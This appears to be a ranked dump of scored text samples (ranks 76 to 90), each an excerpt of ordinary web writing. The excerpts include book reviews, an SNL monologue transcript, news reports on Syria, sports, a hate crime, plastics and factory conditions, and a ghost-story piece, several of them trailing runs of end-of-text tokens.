1957 by John Keats, a journalist at the now defunct Washington Daily News. A lacerating (and very funny) indictment of postwar suburbs as "fresh-air slums," Keats’s polemic sold millions of copies in paperback. It revolves around the tragicomic story of the Drones, a nice young couple gulled, first, into buying a box at Rolling Knolls Estates, and then into thinking a larger, more expensive box in a different suburb could cure what ailed them. + +When, near the start of the book, Mary hurts her leg and yells at her husband, Keats blames her agitation on her inadequate living space. If the house had had a basement, he notes, she could have hung the washing there rather than in the living room. If it had had more storage space, the tricycle wouldn’t have stood in her way. If it had had a separate dining room, rather than a rudimentary "dining alcove" off the kitchen, she wouldn’t have struggled to converse with a friend over the shouts of their children, which had frayed her nerves earlier the same day. + +The problem was not Mary. It was her house: + +[S]omewhere deep inside her she knew perfectly well that the house she inhabited had helped spoil her +================================================================================ +Rank = 76; Score = 790528.0 +<|begin_of_text|>Saturday Night Live Transcripts + +Season 1: Episode 1 + +75a: George Carlin / Billy Preston, Janis Ian + +George Carlin’s Monologue + +…..George Carlin + +George Carlin: Thank you! Talk about a live show! It’s nice to see you, welcome, and thanks for joining us – live. Um.. I’m kinda glad that we’re on at night, so that we’re not competing with all the football and baseball. So many, man.. And this is the time of year when there’s both, you know? + +Football’s kinda nice, they changed it a little bit – they moved the hash marks in. Guys found it and smoked them, anyway! But you know, football wants to be the number-one sport, the national pasttime. And I think it already is, really, because football represents something we are – we are Europe, Jr. When you get right down to it, we’re Europe, Jr. We play a Eurpe game. What was the Europe game? [ high voice ] “Let’s take their land away from them! You’ll be the pink, on up; we’ll be blue, the red and the green!” + +Ground acquisition. And that’s what football is, football’s a ground acquisition game. You knock the crap out of eleven guys and take their land away from them. Of course, we only do it ten yards at a time. That’s the way we did it with the Indians – we won it little by little. First down in Ohio – Midwest to go! + +Let’s put it this way – there are things about the words surrounding football and baseball, which give it all away: + +Football is technological; baseball is pastoral. + +Football is played in a stadium; baseball is played in the park. + +In football, you wear a helmet; in baseball, you wear a cap. + +Football is played on an enclosed, rectangular grid, and everyone of them is the same size; baseball is played on an ever-widening angle that reaches to inifinity, and every park is different! + +Football is rigidly timed; baseball has no time limit, we don’t know when it’s gonna end! We might even have extra innings! + +In football, you get a penalty; in baseball, you make an error – whoops! + +The object in football is to march downfield and penetrate enemy territory, and get into the end zone; in baseball, the object is to go home! “I’m going home!” + +And, in football +================================================================================ +Rank = 77; Score = 778240.0 +<|begin_of_text|>Darkness comes early to the streets of this ancient city, once a symbol of Syria’s richly storied past and now at the heart of the deepening nightmare that the country’s revolution has become. + +By 5 p.m., people are scurrying home, down streets potholed by artillery, past piles of rubble and mountains of garbage that hasn’t been collected in months, to spend the evenings huddled in the cold without heat, light or, increasingly, food. + +“We just lie under blankets because it is so cold. We have no work, no money and no life,” said Omar Abu Mohammed, 55, one of the few remaining residents of his badly bombed neighborhood, as he prepared to head indoors for the night. + +“It is time to go now because soon there will be snipers,” he added, as a shell boomed softly in the distance. + +Shells are exploding somewhere in Aleppo most of the time, but after five months of fighting, people have become inured to the ever-present threat. Rain and cloudy skies have deterred warplanes, providing some relief from the airstrikes that can wipe out whole apartment buildings, along with their inhabitants, in an instant. + +But the onset of this second winter since Syrians rose up against their government 22 months ago is bringing new calamity to a people already ground down by violence and war. Hunger, cold and disease are emerging as equally profound challenges in the desperate daily struggle that life has become for millions, not only in Aleppo but across Syria, where the quest for greater freedoms sparked by the Arab Spring has gone badly, horribly wrong. + +“You can hide from the shelling, but if your child is hungry and there is no bread, what can you do?” asked Abdullah Awuf, 29, a driver who struggles to feed his infant son amid sky-high prices for fuel and food. + +Aleppo is not the only place in Syria where conditions are dire. Across the country, reports are emerging of people foraging for food in garbage, stripping buildings for firewood and queuing for hours for scarce bread as the government-run distribution network breaks down. + +The United Nations appealed last week for $1.5 billion to help 4.5 million needy Syrians, a record amount for an emergency, said Panos Moumtzis, the regional relief coordinator for the U.N. refugee agency. This one is unfolding almost entirely out of sight because most places are too dangerous or inaccessible for aid workers or journalists to visit. + +Most of the relief money, $1 billion, will be +================================================================================ +Rank = 78; Score = 774144.0 +<|begin_of_text|>During Bellator 145, King Mo’s entry to the RIZIN FIGHTING WORLD GRAND-PRIX 2015 and Gabi Garcia vs Lei’D Tapa’s matchup was announced. + +On November 6th, Bellator 145 – VENGEANCE was held at the Scottrade Center St. Louis, Missouri. + +Right before the co-main event, RIZIN chairman Nobuyuki Sakakibara, Gabi Garcia, Lei’D Tapa and King Mo entered the cage. + +Chairman Sakakibara announced that RIZIN will be aired on Spike TV, and that many big names will participate in the event on New Year’s Eve. The host followed by mentioning that King Mo will be participating in the RIZIN FIGHTING WORLD GRAND-PRIX 2015 tournament representing Bellator, and the matchup between Gabi Garcia vs Lei’D Tapa. + +After receiving the Tournament Qualifier board, he stated that “I am happy to be able to fight in Japan. I will become king in Japan as well”. The crowd showed their support with loud cheering and applause. Gabi Garcia and Lei’D Tapa had an intense stare down and quickly got into fight mode. + +During the post-fight press conference King Mo said “I am going to Japan and I am going to be the best. I am going to be the best for Japanese fans and I am going to fight hard to get that prize money. + +Gabi Garcia, with a confirmed opponent, “I am glad I have a chance to fight Tapa. This is going to be a very tough fight for both of us. She is strong, but I am strong too! She is not easy, but I am ready. I am going to fight for Japan, for my family, for my soul”. + +Lei’D Tapa stated “I am so excited! I know it’s is going to be a challenge for me. Gabi is a professional Jiu Jitsu fighter and I am a pro wrestler, we have different style. But I am training very hard with American Top Team in Florida, we training very hard to prepare for Japan, and I will do anything it takes for the win. + +RIZIN Fighting Federation Chairman finished by mentioning “This is going to be an intense fight. This will be the fight that everybody will be wanting to witness. Tapa is a fighter with lots of potential, and is not a pushover fight for Gabi.” Who will be entitled as the “Toug +================================================================================ +Rank = 79; Score = 770048.0 +<|begin_of_text|>Please enable Javascript to watch this video + +MILWAUKEE -- A Muslim woman was attacked as she walked home from prayer. Milwaukee police tell FOX6 News they are investigating the crime that occurred near South 13th and Layton. The incident happened Monday morning, April 10th around 6:00 a.m. -- and the victim was just released from the hospital Tuesday afternoon. The details of the crime have some in the Islamic community saying it was a hate crime. + +"I said to myself, 'I am going to die today for sure.' So he gets up from the car and told me to come here," said the woman who was attacked. + +The woman, who does not want her identity to be shared, said a car pulled up alongside her. + +"And one man came from a car," she said. + +That man wanted only one thing: to remove the woman's hijab, or head scarf. + +"He said to take my hijab, my scarf. I tried to fight him. 'Don't take my hijab,' you know? So he threw me on the floor then he beat me like an animal," said the victim. + +The attacker was able to pull the scarf off. Blood stains remained on it Tuesday: + +The woman said her attacker threw her to the sidewalk, and then stepped down on her head repeatedly. She described him taking out a knife to cut her jacket and her arm. + +"Certainly we're scared for our community members. As an Islamic community, we want to make sure our community is always safe. The initial reaction is shock," said Munjed Ahmad with the Islamic Society of Milwaukee. + +Those at the Islamic Center will discuss having security patrols on nearby streets. At this point, they believe this to be a hate crime. + +"Nothing was stolen. There was no robbery. Her valuables remain with her. The only motive we can think of -- because everything stayed with her and this individual went straight for her scarf is a hate crime," said Ahmad. + +Those from the community are glad the attacker didn't take more -- the woman's life. + +The victim somehow made it home. That's where she had a seizure and was taken to the hospital. She said during the beating, the attacker was calling her names and swearing at her. + +Police say they are investigating and there is no suspect in custody at this time. + +Monitor FOX6 News and FOX6Now.com for updates on this developing story.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 80; Score = 770048.0 +<|begin_of_text|>Food safety experts have written an open letter to supermarkets calling on them to introduce a plastic-free aisle in their stores. + +The campaign, launched by environment group A Plastic Planet, has the backing of doctors, scientists and a host of celebrities to highlight the potential dangers of chemicals from plastic leaking into food. + +People more aware of plastics danger + +The group's organiser Sian Sutherland, told Sky News: "The one thing we can't do now is push our trolleys to get our meat, our fruit and fish in a plastic-free aisle. + +"There is increasing scientific evidence to say there could be seepage from plastic into our food. + +:: Plastic waste on beaches underestimated by 80% - study + +"We want to work with supermarkets to prove that consumers will want to shop in a plastic-free aisle. + +"So many people complain to me about how they are filling their bins with plastic packaging when they get their food home from the supermarket. + +"There is a sea of plastic, most of which will be used just one time and then will be on our planet forever. + +"Supermarkets want to give us choice and now we want the choice between buying our food in plastic or not. We need a bold move and we can vote with our wallets." + +Ocean Rescue: Isabel's plastic challenge + +Every day eight million tonnes of plastic is dumped into oceans and it is estimated by 2050 there will be more plastic by weight in the sea than fish. + +:: Sky Ocean Rescue: How can we solve the problem? + +Some scientists believe plastics are having an impact on people's health as they become exposed to chemicals such as phthalate and BPA - an industrial chemical used to make plastics - which may cause cancer, metabolic and cognitive behaviour disorders. + +Documentary: Plastics danger to islands' shores + +A Plastic Planet is calling for people to video themselves on their phone saying, "I am a plastic addict but I am ready for change. I want a plastic-free aisle", and post it on their website aplasticplanet.com + +Sky News launched its Sky Ocean Rescue campaign earlier this year aimed at reducing the amount of plastic waste that ends up in the world's seas. + +:: You can find out more about the Sky Ocean Rescue campaign and how to get involved at www.skyoceanrescue.com<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 81; Score = 765952.0 +<|begin_of_text|>Man fined for killing and eating puppy + +Updated + +A Kimberley man has escaped jail for roasting and eating a puppy on the banks of the Fitzroy River. + +Passers-by watched in horror as a 28-year-old man killed the puppy with a blunt steak knife, then roasted it on a campfire and ate it. + +They phoned police, saying it appeared the animal suffered a slow and painful death. + +The court was told he committed the act because he was hungry. + +The man was charged with ill-treating an animal contrary to the Welfare Act, which carries a maximum penalty of five years in jail and a $50,000 fine. + +After a year of counselling, the Fitzroy Crossing Magistrate yesterday fined him $2,500, which is just above the minimum penalty. + +Topics: animal-welfare, fitzroy-crossing-6765 + +First posted<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 82; Score = 761856.0 +<|begin_of_text|>Do you have a friend who is in the process of turning into Bridezilla (or even Groomzilla, since women certainly don't have a monopoly on wedding madness)? Then I have the perfect gift for her – though on second thoughts, perhaps this is a treat best left until after her nuptials when, one hopes, your friend will miraculously recover her mislaid sense of humour. Adrian Tomine, author of the brilliant Shortcomings and a cartoonist at the New Yorker, has written a "prenuptial memoir" called Scenes from an Impending Marriage in which he lays bare, with ruthless efficiency, the bizarre effect that organising a wedding can have on even the sane and the cynical (and Tomine, as fans will know, is nothing if not cynical). Is it accurate? Yes, as a laser. Is it hilarious? All I can say is that it will make you – if not your good pal Bridezilla – snort like a dragon. Don't, on any account, combine reading it with lunch. + +Tomine's specialist subject is angst and alienation among young bohemians; his characters wear heavy spectacles and cool sneakers, they eat a lot of takeout, and they worry excessively about fitting in. It's a world he knows well: Tomine has never flinched from the idea that much of what he writes and draws is thinly disguised autobiography. But because he's so devastatingly observant, he cannot be anything other than hardest on himself. Scenes from an Impending Marriage is more of the same, really, only this time it's explicit: the book began its life when his fiancee, Sarah, begged him to draw a miniature comic book for their guests as a wedding "favour". I wonder what those guests think now. One of the book's funniest sections is about who one invites to a wedding, and why. His list, compared with hers, is tiny. "Come on!" he yells, in a funk before they've even begun. "We've gotta break this endless cycle of obligation and reciprocity!" + +It's all here: from choosing a venue, to picking a DJ, to registering for a wedding list ("It's emblematic of our whole culture: 'I want lots of stuff and I want to shoot a gun!'" observes Adrian in Crate & Barrel, where couples must use a barcode scanner to compile their list). There is even a section entitled: "An Even-Handed Acknowledgment of Both Families' Cultural Heritage", +================================================================================ +Rank = 83; Score = 757760.0 +<|begin_of_text|>The familiar telephone seems the least likely thing you'd associate with the supernatural, but over the years, there have been literally hundreds of reports of ghosts ringing up people, and that is the subject of this collection of Strange But True tales: phone calls from the dead... + +In 1969, a New Jersey rock musician named Karl Uphoff received a phone call from his grandmother; nothing unusual about that you might think, but Karl's Gran had passed away two days earlier. Karl was eighteen at the time of the phantom call, and there had always been a special bond between him and his Gran, who was deaf. She used to phone up Karl's friends and ask: 'Is Karl There?' but because she knew she wouldn't be able to hear the reply, Karl's Gran would then say, 'Tell him to come home at once.' Karl's friends were always irritated by the deaf old woman's constant calling, and used to tell Karl he shouldn't have given his Gran their phone numbers. + +One day Karl's Gran passed away and the teenager was naturally upset, but he had no leanings towards spiritualism, and obviously never expected to hear from his Gran ever again. But Karl was wrong. One evening in 1969, Karl was with his friends in the basement of an apartment in Montclair, New Jersey, when the mother of his friend came down and said that Karl was wanted on the phone. When Karl went upstairs he talked to the old woman and realised he was talking to his Gran, who had recently died. Before he could ask her how she could talk to him when she was dead, the woman hung up. Many more calls followed, but on each occasion, when Karl's Gran was asked how she was still able to communicate, or what the 'other side' was like, the old woman would hang up. In the end, the calls stopped, but Karl felt that his Gran was still watching over him. + +Another chilling phone call from beyond the grave allegedly occurred in Wilmslow, Cheshire in 1977, when a young woman named Mary Meredith received a call at her home from her cousin Shirley in Manchester. Mary shuddered when she heard Shirley's voice on what sounded like a bad line, because only minutes before, Mary had received a telephone call from her aunt telling her of Shirley's tragic death in a car crash just an hour ago. Again, before the phantom caller could be questioned, she hung up. + +In 1995, a radio station in Liverpool, England featured a medium named James +================================================================================ +Rank = 84; Score = 757760.0 +<|begin_of_text|>Richard Hofmeier is about to go on a rant. A very polite rant, as it happens. A rant so polite, in fact, that he starts - as all good rants don't - with an apology. "Bear with me, this is going to be a rant," he announces, "so I'm sorry." + +"This IGF nomination has made me real snooty," Hofmeier continues. "It's going to get bad here for a second. The idea of Cart Life and the reason I wanted to use the pixel aesthetic is not arbitrary and it's not entirely nostalgic. Pixels - the large, rectangular hallmark of pixel art - do something that parallels what the rest of the game does in its gesture. + +"You have the human eye, infinitely complex and mysterious and beautiful, represented by a single black dot. That simplification, as profane as it is, taking all that nuance and beauty and summating it with a single black rectangle, and then getting entire expressions for these characters this way? The difference between the human face and this pixel grid is infinite, but we can bridge the gap. We can fill in their details with our own lives. This is why I wanted to use pixels for the game. + +"What Cart Life does with the human face, it does for the whole human experience, hopefully. That's the intention. Even though you get really clumsy, overt, roughly cut-corners standing in for drinking coffee, falling asleep, having a dream - these single evidence hallmarks of these characters' day-to-day lives - hopefully you can fill them in with your own experiences. Everybody knows what it's like to be hungry or exhausted or worried about money. Everybody I know anyways. Filling in those blanks is just the same as what you're doing with the pixel faces. It's an invitation. In a way it's asking the player to do even more work with me, so together between the two of us we can observe something more true than would have been possible otherwise." + +Interestingly, I hadn't actually asked Hofmeier why he chose a pixelly 8-bit aesthetic for Cart Life, but that's the joy of interviewing someone with such a fidgety, wide-ranging mind. He's like a fruit machine for insights and asides, spilling out cogent little chunks of thought on everything from polyphasic sleeping (he's tried it, on the backseat of a 1991 Toyota Camry) to Tristram Shandy (a fan, inevitably) and the best approach +================================================================================ +Rank = 85; Score = 753664.0 +<|begin_of_text|>A survey by Comedy Central UK last year showed that parents embarrass their children, on average, a staggering 14 times a week. Pretty much everything about parental behaviour appears to be painfully humiliating these days, from “their age” to “their hobbies”, from “their dance moves” to the undeniable fact that they are, most of the time, “generally uncool”. + +The worst offence, however, is the things parents say in public, whether it is shouting “I love you” at the school gate or telling their teenagers off in front of their friends. + +In Norway, 15-year-old Martin Odegaard does not appear to have this problem. A few weeks ago his dad, Hans Erik, told the press that “more than 30 [of the best clubs in Europe] have made an inquiry” about his son. Whatever the opposite to embarrassing is for a 15-year-old, that comment probably sums it up. Which football loving boy or girl would not love to hear one of their parents say something like that? + +That was on 30 July and the 15-year-old had, by then, started a mere four Norwegian league games for Stromsgodset, the club his father played for too. Since then, the interest in Odegaard has exploded. He has become a YouTube sensation and been interviewed by the international press. He has been called up by the Norway coach, Per-Mathias Hogmo, and is on Wednesday set to become the youngest ever player to represent his country, beating Tormod Kjellsen’s 104-year-old record. + +It is, at this point, important to point out that Hogmo’s squad for the friendly against United Arab Emirates in Stavanger includes only one player playing abroad and, when the big guns return for the game against England next week, Odegaard will not keep his place (unless he is a late addition). The 15-year-old is not quite among the 23 best players in the country. Not just yet. + +To the clubs (or vultures, whichever way you see it) circling around Odegaard, it does not matter. Last weekend, against Stabaek, more than 30 clubs had representatives at the Marienlyst Stadion to watch him play – among them, reportedly, Real Madrid and Liverpool. Stromsgodset lost 3-2 and there has, predictably and understandably, been a debate in Norway on whether such extreme exposure is good for such a young player. As someone pointed out +================================================================================ +Rank = 86; Score = 753664.0 +<|begin_of_text|>Medical Marijuana Measure Possible On November Ballot + +The November election may be months away, but Ohioans are already preparing to cast their votes on many issues — including whether to legalize a form of medical treatment that's used in more than a dozen states and Washington D.C. + +"I couldn't sleep. I couldn't stand. I couldn't sit. There's no position you can place yourself in where you're comfortable," said Cynthia Wynia, who has used marijuana for pain management. + +Wynia says her pain as a result of spine problems was unbearable. + +After undergoing three rounds of physical therapy, several Cortizone injections, and surgery, nothing seemed to be working. + +Then, she was given a different kind of treatment. + +"A friend of mine offered me some marijuana," said Wynia. The results, she says, were unlike anything she had ever tried. + +"It took me a while to realize it. I was getting up and down. I was going up stairs. I was moving around — dancing. It didn't hurt. I said 'I do not hurt'," said Wynia. + +She only used the drug once, but was pain-free for the first time in years and feels marijuana should be legalized for medical reasons. Not everyone agrees. + +"It's an ever-changing drug, and it's not really a benign drug. It's a drug that we need to look at very carefully that causes a lot of harm to our society," said Marcie Seidel, executive director of Drug-Free Action Alliance. + +Seidel says the uncertainty of marijuana's side effects make it difficult to be used as legitimate medicine. + +"I don't know of any other drug in our repertoire of medications where you take it and you know only what it might do, but you have no idea what the side effects are," said Seidel. + +She's says alarmed by marijuana's integration into mainstream society. "In a prevention world, we know that whenever you take away the perception that something is harmful, use will go up." + +For Wynia, the benefits of using marijuana for those suffering from extreme pain far outweigh any negatives. + +"It has its uses, it has its misuses, just like any other substance. If this can relieve pain from people who cannot find relief in any other way, there is no reason not to legalize it for medical use," said Wynia. + +Signatures are still being gathered to put medical marijuana on the Ohio ballot. + +The deadline is July 4. + +Sixteen states currently classify marijuana as legal for medical treatment.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 87; Score = 753664.0 +<|begin_of_text|>In January 1848, a work crew at John Sutter’s mill, near Sacramento, California, came across a few select nuggets of gold. Before long, a half-million prospectors arrived there seeking instant riches. The gold rush was on. Some 153 years later, another gold rush broke out at an old mine called Red Lake, in northwestern Ontario. This time, the fortune hunters wielded geological-modeling software and database mining tools rather than picks and shovels. The big winners were from Australia. And they had never even seen the mine. + +Rob McEwen, chairman and CEO of Goldcorp Inc., based in Toronto, had triggered the gold rush by issuing an extraordinary challenge to the world’s geologists: We’ll show you all of our data on the Red Lake mine online if you tell us where we’re likely to find the next 6 million ounces of gold. The prize: a total of $575,000, with a top award of $105,000. + +The mining community was flabbergasted. “We’ve seen very large data sets from government surveys online,” says Nick Archibald, managing director of Fractal Graphics, the winning organization from West Perth, Australia. “But for a company to post that information and say, ‘Here I am, warts and all,’ is quite unusual indeed.” + +McEwen knew that the contest, which he called the Goldcorp Challenge, entailed big risks. For one thing, it exposed the company to a hostile-takeover bid. But the risks of continuing to do things the old way were even greater. “Mining is one of humanity’s oldest industrial pursuits,” McEwen says. “This is old old economy. But a mineral discovery is like a technological discovery. There’s the same rapid creation of wealth as rising expectations improve profitability. If we could find gold faster, we could really improve the value of the company.” + +McEwen, a small, soft-spoken man with a neatly trimmed mustache and meticulous tailoring, had one big advantage over his slow-footed competitors: He wasn’t a miner, he didn’t think like a miner, and he wasn’t constrained by a miner’s conventional wisdom. As a young man, he went to work for Merrill Lynch, following his father into the investment business. But his father also had a fascination with gold, and McEwen grew up hearing tales of miners, prospectors, and grubstakes at the dinner table. Soon he was bitten by the gold bug too +================================================================================ +Rank = 88; Score = 749568.0 +<|begin_of_text|>Image copyright AFP Image caption A satisfied smile on the podium from Fu Yuanhui (left) + +All Olympians can enjoy the support of their home country, but the enthusiasm of one Chinese swimmer after winning a bronze has made her an overnight social media star, and is changing the view of competitive sport in the country, as the BBC's Yashan Zhao reports. + +"I have used all my prehistoric powers to swim," Fu Yuanhui said in an interview with CCTV5 after she qualified for the women's 100m backstroke final. + +When asked what her hopes were for the final, she said: "No expectation! I'm very satisfied now!" + +That's how she began to rock China's internet and social media. Add her exaggerated facial expressions and humour, and she quickly became an online celebrity. + +See all our Olympics coverage + +Image copyright CCTV-5/Miaopai 'Huangwen Yuxiaopenyou' Image caption Social media users (left) have copied Fu Yuanhui (right) after her enthusiastic CCTV interview + +She eventually won a bronze medal in the 100m backstroke final, not gold. But that hasn't reduced the affection from her fans. + +In fact, her fans on microblogging platform Sina Weibo have increased from a hundred thousand to four million over the past two days, and are still increasing. Many fans have also been sharing cute cartoons of Fu. + +'Everyone is talking about her' + +Young Chinese social media users have been drawn to her straight-forward character, her sincerity and her attitude towards competition. + +Image copyright Fu Yuanhui/Weibo Image caption One cartoon shared by Fu Yuanhui showed her exclaiming "I am so satisfied" + +Joanna Zhan, a fan in Chongqing, said she liked Fu because she is "so cute, and she is as powerful as a mudslide". + +"Fu interpreted the Olympic spirit of challenging herself and enjoying the game," she added. + +Chinese athletes traditionally follow a pattern in media interviews after they compete, thanking the country and vowing to do their best in the next competition. + +But Fu broke with tradition, showing her own happiness at her performance. + +Image copyright Reuters + +One fan, Feng Zhu, told the BBC she liked Fu because she always said exactly what was on her mind. + +JingYing Li, a female entrepreneur in Sichuan province, said she heard about Fu from her friends. "Almost everyone is talking about her," she said. + +Ms Li said her colleagues had all been sharing videos and articles about +================================================================================ +Rank = 89; Score = 745472.0 +<|begin_of_text|>Women working in Cambodian factories supplying some of the world’s best-known sportswear brands are suffering from repeated mass faintings linked to conditions. + +Over the past year more than 500 workers in four factories supplying to Nike, Puma, Asics and VF Corporation were hospitalised. The most serious episode, recorded over three days in November, saw 360 workers collapse. The brands confirmed the incidents, part of a pattern of faintings that has dogged the 600,000-strong mostly female garment workforce for years. + +A journey across four continents: Danziger's tales from Cambodia | Rory MacLean Read more + +The Observer and Danwatch, a Danish investigative media group, interviewed workers, unions, doctors, charities and government officials in the country’s garment industry, worth $5.7bn in 2015. + +The women who collapsed worked 10 hour days, six days a week and reported feeling exhausted and hungry. Excessive heat was also an issue in three factories, with temperatures of 37C. Unlike in neighbouring Vietnam, where factory temperatures must not exceed 32C, Cambodia sets no limit, though if temperatures reach a “very high level” causing difficulties for workers, employers must install fans or air conditioning. + +According to unions, short-term contracts – common for workers in three of the factories – were also a key source of stress and exhaustion. + +If workers are fainting, it should be a clear indication that you need to do something more drastic Bent Gehrt, Worker Rights Consortium + +The minimum monthly wage in Cambodia is £120 and two hours’ overtime a day boosts it to between £150 and £190, depending on the factory. Wages vary, but none of the four factories pays the “living wage”, which in Cambodia is £300 a month, according to the workers’ rights alliance Asia Floor Wage. + +Bent Gehrt, south-east Asia field director for the Worker Rights Consortium, which monitors factories making clothing for US universities, said: “There is no proper investment in an adequate working environment and no investment in the living wage. If workers are fainting, it should be a clear indication you need to do something more drastic.” + +Short-term contracts were a “root cause” of job insecurity, he added, meaning people cannot refuse overtime: “Workers say if you don’t do overtime, you won’t get your contract renewed.” + +Mass collapses bring factories to a standstill and cost “hundreds of thousands” of pounds in lost productivity, according to the Garment Makers Association in Cambodia. A factory +================================================================================ +Rank = 90; Score = 741376.0 +<|begin_of_text|>Media playback is unsupported on your device Media caption Some of the passengers onboard took video footage of what it was like inside the Air India plane + +Passengers were stranded on a plane on the tarmac at Gatwick Airport for more than eight hours after fog caused their flight to be diverted. + +The Air India flight was on its way from Mumbai to Heathrow Airport when the weather conditions forced it to divert to Gatwick at about 08:00 BST. + +It resumed its journey at 17:00 